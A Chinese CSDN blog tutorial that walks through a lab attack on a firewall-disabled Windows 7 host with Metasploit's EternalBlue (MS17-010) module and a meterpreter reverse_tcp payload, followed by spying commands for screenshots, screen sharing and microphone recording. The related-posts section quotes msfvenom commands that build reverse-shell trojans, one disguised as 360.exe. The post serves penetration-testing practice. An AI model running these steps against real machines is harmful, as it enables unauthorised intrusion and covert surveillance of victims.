Metasploit入侵win7系统

最新推荐文章于 2023-10-12 11:09:13 发布
最新推荐文章于 2023-10-12 11:09:13 发布
阅读量2.2k 收藏 18
点赞数
分类专栏: Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45092418/article/details/106837981
版权

Metasploit入侵win7系统

一:实验环境

主机:安装有Metasploit的kali linux 操作系统
目标:已关闭防火墙的win7系统

二:获得信息

a.获得网络拓扑图

画出网络拓扑图,确定你和目标主机在同一局域网下。

b.获得主机ip和目标ip

1.主机ipifconifg
在这里插入图片描述
这里的eth0是你有线连接的ip地址,也是lhost。
2.目标ipnmap -nsP 192.168.x.x/24
192.168.x.x/24,通过扫描得到与你相同网段下所有主机IP,加以区分后,最终得到rhost。

三:实施入侵

a.打开控制终端

输入:msfconsole
在这里插入图片描述

b.查找漏洞

控制台输入search platform:windows 7
在这里插入图片描述
这里我使用1037对应的漏洞攻击:控制台输入use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

c.进行配置

set payload/windows/meterpreter/reverse_tcp
set lhost 192.168.x.x
set rhost 192.168.x.x
set lport 2345
run

四:对主机进行操作

help命令可以查看有那些命令可以使用,下面是一些立竿见影的:

screenshot  #这个是屏幕截图
screenshare	#这个是实时获取另一主机屏幕内容
record_mic  #开始录音
dir 		#查看目标主机所有文件

五:做个守法的好青年

可能有人会质疑了,你关闭了防火墙再去入侵,相当与没做啊!原谅我还只是个菜鸡中的菜鸡,等我哪一天会绕过防火墙了,我会再写一篇告诉你们的!!!还有,入侵不是给你个IP就行了,真实生活中,肯定有好多意外发生,但电脑的防火墙是可以主动关闭的。

尽是他乡之客
关注
  • 0
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2677
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
利用MS17-010渗透win7(32位)
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
kali利用ms17-010漏洞实现win7系统入侵
最新发布
2301_77296801的博客
10-12 1633
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
利用msf入侵电脑
weixin_44761350的博客
05-25 1139
msf
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1346
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
metasploit 入侵测试手册
06-19
metasploit penetration testing cookbook
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
windows局域网的一个经典的入侵方法
11-22
然后在cmd底下输入 telnet 对方ip地址 就会显示对方的一个cmdshell了,当然这里有个小技巧,如果你不知道对方ip怎么办。很简单cmd下输入net view 可以查看到局域网计算机名..................
白帽子学习——Metasploit渗透测试指南
weixin_43487532的博客
09-12 3575
黑客之渗透初学
关于使用msf渗透攻击Win7主机并远程执行命令的复习
weixin_44663190的博客
04-16 5334
关于使用msf渗透攻击Win7主机并远程执行命令的复习 一、关于环境的搭建 攻击机:kali 靶机:win7 旗舰版 sp1 win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况 关于kali系统win7 旗舰版sp1的安装就不多赘述,很多博文都已经讲述 1.1 打开虚拟机软件,准备开始环境 1.2 打开已经配置好的两个虚拟环境 1.3 配置...
网络安全之入侵win7主机自学笔记
追梦娃的博客
07-30 1116
第一步、 首先输入msfconsole命令用以启动。 root@congratulations:~# msfconsole [-] ***rting the Metasploit Framework console.../ [-] * WARNING: No database support: No database YAML file [-] *** ...
笔记: kali metasploit ms17_010 入侵 win7
qq_38611079的博客
10-11 6061
ping 原理:利用网络上机器IP地址的唯一性,给目标IP地址发送一个数据包,再要求对方返回一个同样大小的数据包来确定两台网络机器是否连接相通,时延是多少。ping也属于一个通信协议,是TCP/IP协议的一部分      (百度百科)    首先要先ping一下两台机子,看能不能连接的通。(因为如果ping不通的话,数据包无法传达到,那么后面的也就没有意义了) 刚开始的时候我是直接ping的...
MS08-067漏洞 入侵Windows7
qq_34835962的博客
04-10 1693
Metasploit入侵win7
qq_53030229的博客
11-07 1829
文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据 一、Metasploit是什么? 这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行) Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板
kali之入侵Win7系统1
weixin_33743880的博客
11-15 3821
木马程序:当执行这个程序时,隐藏的恶意程序在用户不知情的情况下也会执行,在内存中运行 写木马文件,并赋予权限 root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.123 lport=33389 -f exe > 360.exeroot@kali:~#ch...
渗透工具之msf
热门推荐
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
metasploit 木马 win10
08-12
Metasploit是一款功能强大的渗透测试工具,可以用于创建和管理各种类型的恶意软件,包括木马。对于在Windows 10系统上使用Metasploit创建木马,您可以使用msfvenom来生成适用于Windows 10的恶意软件。 例如,您可以使用以下命令来生成一个适用于Windows 10系统的反向TCP木马: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.128 LPORT=1234 -f exe -o win10-1.exe 这个命令将生成一个名为win10-1.exe的可执行文件,其中包含一个反向TCP木马。通过将此木马传递给目标系统,并确保您的监听器配置正确,您可以在目标系统上建立一个与Metasploit的反向连接,以便执行各种操作,如查看目标的桌面、监听麦克风、打开摄像头等。请注意,创建和使用恶意软件可能是非法的,只能在合法的渗透测试或授权的安全测试中使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [6. MetasploitMetasploit木马](https://blog.csdn.net/qq_41860876/article/details/105627201)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机](https://blog.csdn.net/White_give_boy/article/details/116477691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值